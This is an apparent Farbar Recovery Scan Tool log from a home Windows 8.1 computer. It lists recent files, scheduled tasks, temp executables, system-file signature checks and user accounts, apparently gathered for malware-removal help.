2016-01-04 15:05 - 2016-01-04 15:05 - 00000000 ____D C:\Users\Joseph\AppData\Local\Apple
2016-01-04 12:38 - 2016-01-04 20:08 - 00000000 ___HD C:\OneDriveTemp
2016-01-04 12:38 - 2016-01-04 12:38 - 00000000 ____D C:\Users\Joseph\OneDrive
2016-01-04 12:24 - 2016-01-04 12:24 - 00482240 _____ C:\Windows\system32\FNTCACHE.DAT
2016-01-04 12:22 - 2016-01-04 12:23 - 05762544 _____ (AVAST Software) C:\Users\Joseph\Downloads\avastclear.exe
2016-01-04 12:17 - 2016-01-04 12:17 - 00001717 _____ C:\Users\Joseph\Desktop\Amnesia The Dark Descent.lnk
2016-01-04 12:17 - 2016-01-04 12:17 - 00000000 ___HD C:\Windows\msdownld.tmp
2016-01-04 12:17 - 2016-01-04 12:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amnesia The Dark Descent
2016-01-04 12:10 - 2016-01-04 12:10 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Macromedia
2016-01-04 12:05 - 2016-01-04 12:05 - 00000000 ____D C:\Users\Joseph\Tracing
2016-01-04 12:03 - 2016-01-04 12:09 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Skype
2016-01-04 11:27 - 2016-01-04 11:27 - 00000000 ____D C:\Users\Joseph\Documents\My Games
2016-01-04 11:05 - 2016-01-04 11:05 - 00037065 _____ C:\Users\Joseph\Downloads\[kat.cr]mcafee.virusscan.enterprise.8.7i.full.multilanguage.torrent
2016-01-04 10:58 - 2016-01-04 10:58 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\WinRAR
2016-01-04 10:52 - 2016-01-04 17:28 - 00003378 _____ C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1412126346-3748250155-1825200208-1002
2016-01-04 10:52 - 2016-01-04 17:28 - 00003326 _____ C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1412126346-3748250155-1825200208-1002
2016-01-04 10:52 - 2016-01-04 10:52 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\RealNetworks
2016-01-04 10:51 - 2016-01-04 10:51 - 00000000 ____D C:\Users\Joseph\AppData\Local\Real
2016-01-04 10:50 - 2016-01-04 11:00 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Real
2016-01-04 10:50 - 2016-01-04 10:58 - 00000000 ____D C:\Users\Joseph\Downloads\Games
2016-01-04 10:50 - 2016-01-04 10:50 - 00000000 ____D C:\Users\Joseph\AppData\Local\CrashRpt
2016-01-04 10:28 - 2016-01-04 10:58 - 00000000 ____D C:\Users\Joseph\Downloads\Music Downloads, Discos, and Extra
2016-01-04 10:27 - 2016-01-04 10:28 - 00000000 ____D C:\Users\Joseph\Downloads\PC Performers
2016-01-04 10:26 - 2016-01-04 10:28 - 00000000 ____D C:\Users\Joseph\Downloads\Game Downloads
2016-01-04 10:24 - 2016-01-04 10:24 - 00000085 _____ C:\Windows\wininit.ini
2016-01-04 10:19 - 2016-01-04 10:19 - 00000000 ____D C:\Users\Joseph\.oracle_jre_usage
2016-01-04 10:12 - 2016-01-04 20:05 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1412126346-3748250155-1825200208-1002
2016-01-04 10:07 - 2016-01-04 10:07 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\AVAST Software
2016-01-04 10:07 - 2016-01-04 10:07 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Adobe
2016-01-04 10:05 - 2016-01-04 12:31 - 00000000 ____D C:\Users\Joseph\AppData\Local\Packages
2016-01-04 10:04 - 2016-01-04 17:54 - 00000000 ____D C:\Users\Joseph\AppData\Local\Google
2016-01-04 10:04 - 2016-01-04 10:26 - 00000000 __SHD C:\Users\Joseph\IntelGraphicsProfiles
2016-01-04 10:04 - 2016-01-04 10:04 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Synaptics
2016-01-04 10:04 - 2016-01-04 10:04 - 00000000 ____D C:\Users\Joseph\AppData\Local\VirtualStore
2016-01-04 10:01 - 2016-01-04 12:38 - 00000000 ____D C:\Users\Joseph
2016-01-04 10:01 - 2016-01-04 10:01 - 00000020 ___SH C:\Users\Joseph\ntuser.ini
2016-01-04 10:01 - 2016-01-04 10:01 - 00000000 _SHDL C:\Users\Joseph\My Documents
2016-01-04 10:01 - 2016-01-04 10:01 - 00000000 _SHDL C:\Users\Joseph\Documents\My Videos
2016-01-04 10:01 - 2016-01-04 10:01 - 00000000 _SHDL C:\Users\Joseph\Documents\My Pictures
2016-01-04 10:01 - 2016-01-04 10:01 - 00000000 _SHDL C:\Users\Joseph\Documents\My Music
2016-01-04 10:01 - 2015-07-28 20:49 - 00000551 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Documents.lnk
2016-01-04 10:01 - 2015-07-28 20:49 - 00000549 _____ C:\Users\Joseph\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Pictures.lnk
2016-01-04 10:01 - 2014-04-24 20:12 - 00000000 ___HD C:\Users\Joseph\Documents\hp.system.package.metadata
2016-01-04 10:01 - 2014-04-24 20:12 - 00000000 ___HD C:\Users\Joseph\Documents\hp.applications.package.appdata
2016-01-04 09:13 - 2013-08-22 07:25 - 00000824 _____ C:\Windows\system32\Drivers\etc\hosts.20160104-091355.backup
2016-01-04 08:50 - 2016-01-04 12:24 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2016-01-04 08:50 - 2016-01-04 10:24 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2016-01-04 08:50 - 2016-01-04 08:50 - 00000000 ____D C:\Windows\System32\Tasks\Safer-Networking
2016-01-04 03:56 - 2016-01-04 03:56 - 00003046 _____ C:\Windows\System32\Tasks\SafeZone scheduled Autoupdate 1451901358
2016-01-04 03:56 - 2016-01-04 03:56 - 00001060 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avast SafeZone Browser.lnk
2016-01-04 03:54 - 2016-01-04 03:54 - 00000000 ____D C:\Windows\System32\Tasks\AVAST Software
2016-01-03 04:27 - 2016-01-04 02:52 - 00000000 ____D C:\Windows\pss
2015-12-30 18:16 - 2015-12-30 18:19 - 00000276 _____ C:\Windows\Tasks\Start PC Reviver with delay for Liljoethemaster@Liljoe3493.job
2015-12-30 18:16 - 2015-12-30 18:16 - 00002624 _____ C:\Windows\System32\Tasks\Start PC Reviver with delay for Liljoethemaster@Liljoe3493
2015-12-30 17:20 - 2015-12-30 17:20 - 00023082 _____ C:\Windows\System32\Tasks\{087E7947-7E7E-0C0F-0D11-7A050B79117A}
2015-12-30 17:15 - 2015-12-30 17:15 - 00023712 _____ (Corporation) C:\Windows\system32\Drivers\sdfhgdf.sys
2015-12-30 04:37 - 2015-12-30 04:39 - 00000000 ____D C:\Windows\system32\config\RRBackups
2015-12-30 01:34 - 2016-01-04 20:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinDirStat
2015-12-28 13:52 - 2016-01-04 12:30 - 00000304 _____ C:\Windows\Tasks\Start PC Reviver for Liljoethemaster@Liljoe3493(logon).job
2015-12-28 13:52 - 2015-12-28 13:52 - 00003438 _____ C:\Windows\System32\Tasks\Start PC Reviver Schedule
2015-12-28 13:52 - 2015-12-28 13:52 - 00003370 _____ C:\Windows\System32\Tasks\Start PC Reviver Update
2015-12-28 13:52 - 2015-12-28 13:52 - 00002600 _____ C:\Windows\System32\Tasks\Start PC Reviver for Liljoethemaster@Liljoe3493(logon)
2015-12-27 15:15 - 2016-01-04 13:09 - 00000552 _____ C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 0e5ae95f-73dd-4db3-b20f-59643e5fb995.job
2015-12-27 15:15 - 2016-01-04 05:09 - 00000552 _____ C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task f4ed902d-2bcc-4077-b392-aaba5eb3e6f7.job
2015-12-27 15:15 - 2016-01-01 22:00 - 00000552 _____ C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task ea76e74c-ab88-4c06-b5b8-3904632bc604.job
2015-12-27 15:15 - 2015-12-27 15:15 - 00003632 _____ C:\Windows\System32\Tasks\SUPERAntiSpyware Scheduled Task f4ed902d-2bcc-4077-b392-aaba5eb3e6f7
2015-12-27 15:15 - 2015-12-27 15:15 - 00003630 _____ C:\Windows\System32\Tasks\SUPERAntiSpyware Scheduled Task ea76e74c-ab88-4c06-b5b8-3904632bc604
2015-12-27 15:15 - 2015-12-27 15:15 - 00003548 _____ C:\Windows\System32\Tasks\SUPERAntiSpyware Scheduled Task 0e5ae95f-73dd-4db3-b20f-59643e5fb995
2015-12-26 04:13 - 2015-11-27 08:46 - 72203792 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RCoRes64.dat
2015-12-26 04:13 - 2015-11-27 08:46 - 04686592 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\Drivers\RTKVHD64.sys
2015-12-26 04:13 - 2015-11-27 08:46 - 04307112 _____ C:\Windows\system32\Drivers\RTAIODAT.DAT
2015-12-26 04:13 - 2015-11-27 08:46 - 03271912 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkApi64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 03195648 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtPgEx64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 03040488 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RltkAPO64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 02893568 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RTSnMg64.cpl
2015-12-26 04:13 - 2015-11-27 08:46 - 02130584 _____ (DTS, Inc.) C:\Windows\system32\sltech64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 02030208 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RCoInstII64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 01601952 _____ (Conexant Systems Inc.) C:\Windows\system32\CX64APO.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 01435144 _____ (Synopsys, Inc.) C:\Windows\system32\SRRPTR64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 01356512 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RTCOM64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 01328496 _____ (DTS, Inc.) C:\Windows\system32\slcnt64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 01020208 _____ (DTS, Inc.) C:\Windows\system32\sl3apo64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00689888 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtDataProc64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00574760 _____ (Andrea Electronics Corporation) C:\Windows\system32\AERTAC64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00532384 _____ (SRS Labs, Inc.) C:\Windows\system32\SRSTSX64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00467168 _____ (Synopsys, Inc.) C:\Windows\system32\SRAPO64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00387320 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEEP64A.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00381416 _____ (Synopsys, Inc.) C:\Windows\system32\SRCOM64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00343712 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtlCPAPI64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00341160 _____ (Synopsys, Inc.) C:\Windows\system32\SRCOM.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00321720 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RP3DHT64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00321720 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RP3DAA64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00258504 _____ (TODO: <Company name>) C:\Windows\system32\slprp64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00214840 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEED64A.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00192984 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkCfg64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00166208 _____ (SRS Labs, Inc.) C:\Windows\system32\SRSWOW64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00122320 _____ (Real Sound Lab SIA) C:\Windows\system32\CONEQMSAPOGUILibrary.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00118600 _____ (Andrea Electronics Corporation) C:\Windows\system32\AERTAR64.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00110992 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEEL64A.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00088352 _____ (Dolby Laboratories, Inc.) C:\Windows\system32\RTEEG64A.dll
2015-12-26 04:13 - 2015-11-27 08:46 - 00023704 _____ (Realtek Semiconductor Corp.) C:\Windows\system32\RtkCoLDR64.dll
2015-12-24 18:59 - 2016-01-04 02:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2015-12-21 04:44 - 2015-12-21 04:44 - 00000000 ____D C:\Program Files\GTA V
2015-12-19 10:58 - 2015-12-19 10:58 - 00000000 ____D C:\Program Files (x86)\HP
2015-12-11 21:45 - 2016-01-04 02:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2015-12-11 21:45 - 2015-12-30 18:16 - 00001772 _____ C:\Users\Public\Desktop\iTunes.lnk
2015-12-11 21:44 - 2015-12-11 21:45 - 00000000 ____D C:\Program Files\iTunes
2015-12-11 21:44 - 2015-12-11 21:44 - 00000000 ____D C:\Program Files\iPod
2015-12-11 21:44 - 2015-12-11 21:44 - 00000000 ____D C:\Program Files (x86)\iTunes
2015-12-08 20:49 - 2015-12-08 20:49 - 00002760 _____ C:\Windows\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2015-12-07 20:47 - 2015-12-07 20:47 - 00002762 _____ C:\Windows\System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-04 20:59 - 2015-10-25 23:46 - 00000938 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-04 20:57 - 2015-01-29 20:29 - 00000960 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001UA.job
2016-01-04 20:56 - 2013-08-22 07:36 - 00000000 ____D C:\Windows
2016-01-04 20:08 - 2014-03-31 19:07 - 00000000 ___HD C:\SYSTEM.SAV
2016-01-04 20:00 - 2015-11-30 07:14 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-01-04 18:58 - 2015-10-25 23:46 - 00000934 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-04 13:57 - 2015-01-29 20:29 - 00000908 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1412126346-3748250155-1825200208-1001Core.job
2016-01-04 12:36 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\AppReadiness
2016-01-04 12:27 - 2013-08-22 08:45 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-01-04 12:26 - 2013-08-22 07:25 - 00262144 ___SH C:\Windows\system32\config\BBI
2016-01-04 12:17 - 2015-01-14 08:43 - 00000000 ____D C:\Windows\SysWOW64\directx
2016-01-04 12:10 - 2015-08-02 12:48 - 00000000 ____D C:\Games
2016-01-04 12:09 - 2014-03-18 03:53 - 00956476 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-04 12:09 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\Inf
2016-01-04 10:19 - 2015-09-11 03:49 - 00000000 ____D C:\Program Files (x86)\Bruteforce Save Data
2016-01-04 10:16 - 2014-12-16 20:46 - 00000000 ___HD C:\Users\Liljoe3493
2016-01-04 10:15 - 2013-08-22 09:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-04 10:07 - 2014-12-16 20:47 - 00000000 ____D C:\Windows\System32\Tasks\WPD
2016-01-04 09:01 - 2014-12-16 20:52 - 00003598 _____ C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1412126346-3748250155-1825200208-1001
2016-01-04 08:53 - 2015-07-30 11:49 - 00000000 ____D C:\Program Files\Common Files\AV
2016-01-04 07:10 - 2015-11-20 03:35 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2016-01-04 06:08 - 2013-08-22 09:20 - 00000000 ____D C:\Windows\CbsTemp
2016-01-04 03:23 - 2015-01-29 18:44 - 00000000 ____D C:\Program Files (x86)\SplitmediaLabs
2016-01-04 03:22 - 2015-01-29 18:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\XSplit
2016-01-04 02:54 - 2015-04-04 17:37 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2016-01-04 02:54 - 2015-04-04 17:37 - 00000000 ___SD C:\Windows\system32\GWX
2016-01-04 02:54 - 2013-08-22 09:36 - 00000000 __RSD C:\Windows\Media
2016-01-04 02:54 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\PolicyDefinitions
2016-01-04 02:54 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\system32\Sysprep
2016-01-04 02:54 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\servicing
2016-01-04 02:53 - 2015-11-20 03:38 - 00000000 ____D C:\Program Files\SUPERAntiSpyware
2016-01-04 02:53 - 2015-11-20 03:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-01-04 02:53 - 2015-11-20 03:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2016-01-04 02:53 - 2015-10-29 19:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SOMA [GOG.com]
2016-01-04 02:53 - 2015-10-29 18:10 - 00000000 ____D C:\GOG Games
2016-01-04 02:53 - 2015-10-26 00:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome
2016-01-04 02:53 - 2015-08-30 04:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RealNetworks
2016-01-04 02:53 - 2015-08-26 18:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlast
2016-01-04 02:53 - 2015-08-17 15:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2016-01-04 02:53 - 2015-08-06 02:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Amnesia - The Dark Descent
2016-01-04 02:53 - 2015-08-04 19:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Mouse and Keyboard Center
2016-01-04 02:53 - 2015-07-18 15:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BlueStacks
2016-01-04 02:53 - 2015-07-07 17:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bruteforce Save Data
2016-01-04 02:53 - 2015-05-31 09:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ashampoo
2016-01-04 02:53 - 2014-12-26 18:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Elgato
2016-01-04 02:53 - 2014-12-23 13:53 - 00000000 ____D C:\ProgramData\NexonUS
2016-01-04 02:53 - 2014-12-20 15:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-04 02:53 - 2014-12-19 16:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-01-04 02:53 - 2014-11-04 06:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP
2016-01-04 02:53 - 2014-11-04 06:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Music, Photos and Videos
2016-01-04 02:53 - 2014-04-24 20:37 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2016-01-04 02:53 - 2014-04-24 20:27 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Help and Support
2016-01-04 02:53 - 2014-04-24 20:18 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Communication and Chat
2016-01-04 02:53 - 2014-04-24 20:16 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Security and Protection
2016-01-04 02:53 - 2014-04-24 20:15 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Productivity and Tools
2016-01-04 02:53 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-01-04 02:34 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\registration
2016-01-04 02:32 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\FileManager
2016-01-04 02:32 - 2013-08-22 09:36 - 00000000 ____D C:\Windows\Camera
2016-01-04 02:30 - 2015-08-30 04:55 - 00000000 ____D C:\ProgramData\Real
2016-01-04 02:29 - 2014-03-18 03:38 - 00000000 ____D C:\Program Files\Windows Journal
2016-01-04 02:29 - 2013-08-22 09:36 - 00000000 ____D C:\Program Files\Windows NT
2016-01-03 02:15 - 2014-12-23 16:45 - 00000000 ____D C:\Windows\system32\MRT
2016-01-02 22:36 - 2014-04-02 04:25 - 00000000 ____D C:\Windows\Panther
2016-01-02 11:34 - 2014-12-16 21:45 - 00003974 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{C5342454-CD0C-4E31-9608-FCC9E4173C6D}
2015-12-30 18:17 - 2015-10-22 16:11 - 00001044 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-12-30 18:17 - 2015-09-10 05:01 - 00001201 _____ C:\Users\Public\Desktop\XSplit Gamecaster.lnk
2015-12-30 18:17 - 2015-01-29 20:53 - 00002535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Apple Software Update.lnk
2015-12-30 18:17 - 2014-12-19 16:03 - 00000994 _____ C:\ProgramData\Microsoft\Windows\Start Menu\WinRAR.lnk
2015-12-30 18:17 - 2014-04-24 20:23 - 00001390 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Photo Gallery.lnk
2015-12-30 18:17 - 2014-04-24 20:23 - 00001321 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk
2015-12-30 18:17 - 2014-03-18 03:55 - 00002542 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileManager.lnk
2015-12-30 18:17 - 2013-09-30 16:49 - 00001602 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HP Control Zone (Touchpad Clickpad Trackpad Mouse).lnk
2015-12-30 18:17 - 2013-08-22 00:57 - 00002463 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PhotosApp.lnk
2015-12-30 18:17 - 2013-08-22 00:57 - 00002213 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Camera.lnk
2015-12-30 18:16 - 2015-11-29 17:25 - 00000970 _____ C:\Users\Public\Desktop\RealPlayer (RealTimes).lnk
2015-12-30 18:16 - 2015-11-20 03:34 - 00001085 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-12-30 18:16 - 2015-10-29 19:06 - 00001579 _____ C:\Users\Public\Desktop\SOMA.lnk
2015-12-30 18:16 - 2015-10-26 00:48 - 00001277 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-12-30 18:16 - 2015-10-22 16:11 - 00001032 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-12-30 18:16 - 2015-08-26 18:12 - 00000722 _____ C:\Users\Public\Desktop\Outlast.lnk
2015-12-30 18:16 - 2015-07-18 15:49 - 00001843 _____ C:\Users\Public\Desktop\Apps.lnk
2015-12-30 18:16 - 2015-05-31 09:24 - 00001213 _____ C:\Users\Public\Desktop\Ashampoo WinOptimizer 11.lnk
2015-12-30 18:16 - 2014-12-26 18:00 - 00001117 _____ C:\Users\Public\Desktop\Game Capture HD.lnk
2015-12-30 18:16 - 2014-12-19 16:10 - 00000885 _____ C:\Users\Public\Desktop\CCleaner.lnk
2015-12-30 18:01 - 2014-11-04 06:28 - 00000000 ____D C:\Windows\Hewlett-Packard
2015-12-28 17:25 - 2014-12-20 15:34 - 00000000 ____D C:\ProgramData\Oracle
2015-12-28 17:20 - 2014-12-20 15:34 - 00000000 ____D C:\Program Files (x86)\Java
2015-12-28 17:17 - 2014-12-20 15:35 - 00097888 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2015-12-28 17:16 - 2015-07-30 11:46 - 00000000 ____D C:\Program Files (x86)\AVG
2015-12-28 15:32 - 2014-11-04 06:31 - 00000000 ____D C:\Windows\SysWOW64\RTCOM
2015-12-27 18:02 - 2014-12-19 16:10 - 00002782 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2015-12-27 17:56 - 2015-11-29 18:56 - 00003450 _____ C:\Windows\System32\Tasks\RealDownloader Update Check
2015-12-27 17:56 - 2015-11-29 17:25 - 00003388 _____ C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1412126346-3748250155-1825200208-1001
2015-12-27 17:56 - 2015-11-29 17:25 - 00003338 _____ C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1412126346-3748250155-1825200208-1001
2015-12-24 18:59 - 2014-12-19 15:39 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-12-24 18:59 - 2014-12-19 15:39 - 00000000 ____D C:\ProgramData\Skype
2015-12-20 19:11 - 2015-11-20 17:10 - 00003208 _____ C:\Windows\System32\Tasks\HPCeeScheduleForLiljoe3493
2015-12-20 19:11 - 2015-11-20 17:10 - 00000384 _____ C:\Windows\Tasks\HPCeeScheduleForLiljoe3493.job
2015-12-19 10:58 - 2015-11-29 19:49 - 00000000 ____D C:\swsetup
2015-12-15 17:42 - 2015-06-18 16:42 - 00003232 _____ C:\Windows\System32\Tasks\HPCeeScheduleForLILJOETHEMASTER$
2015-12-15 17:42 - 2015-06-18 16:42 - 00000396 _____ C:\Windows\Tasks\HPCeeScheduleForLILJOETHEMASTER$.job
2015-12-14 08:22 - 2015-07-06 16:27 - 00003120 _____ C:\Windows\System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-1412126346-3748250155-1825200208-1001
2015-12-11 21:44 - 2015-01-29 20:52 - 00000000 ____D C:\Program Files\Common Files\Apple
2015-12-06 18:45 - 2014-12-19 18:12 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-06 14:26 - 2014-11-04 06:39 - 00000000 ____D C:\ProgramData\Temp
 
Some files in TEMP:
====================
C:\Users\Joseph\AppData\Local\Temp\COMAP.EXE
C:\Users\Joseph\AppData\Local\Temp\mpam-df95902f.exe
C:\Users\Joseph\AppData\Local\Temp\oi_{65F941F6-5425-4720-96B6-98DBF87CA402}.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-01-04 03:10
 
==================== End of FRST.txt ============================
 
 
 
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:31-12-2015
Ran by Joseph (2016-01-04 21:00:59)
Running from C:\Users\Joseph\Downloads
Windows 8.1 Connected (X64) (2014-12-17 02:46:18)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1412126346-3748250155-1825200208-500 - Administrator - Disabled)
Guest (S-1-5-21-1412126346-3748250155-1825200208-501 - Limited - Disabled)
Joseph (S-1-5-21-1412126346-3748250155-1825200208-1002 - Administrator - Enabled) => C:\Users\Joseph
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
"Outlast" (HKLM-x32\...\{F5489388-87F5-42D3-B8C7-598F32FB2260}_is1) (Version: 1.0.12046.0 (Update 8) - )
Adobe Flash Player 19 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 19.0.0.185 - Adobe Systems Incorporated)
